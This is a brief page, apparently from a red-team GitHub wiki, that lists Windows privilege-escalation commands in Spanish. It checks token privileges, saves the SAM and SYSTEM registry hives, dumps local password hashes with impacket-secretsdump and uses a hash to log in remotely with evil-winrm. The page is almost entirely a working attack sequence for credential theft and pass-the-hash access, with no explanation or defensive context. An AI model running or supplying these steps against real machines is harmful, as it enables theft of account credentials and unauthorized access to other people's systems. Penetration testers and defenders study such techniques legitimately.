Windows ‐ Elevación de privilegios - miremarti/redteam-stuff GitHub Wiki
whoami /priv
reg save hklm\sam <ruta destino>\sam.hive
reg save hklm\system <ruta destino>\system.hive
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
evil-winrm -i <IP> -u <usuario> -H <hash>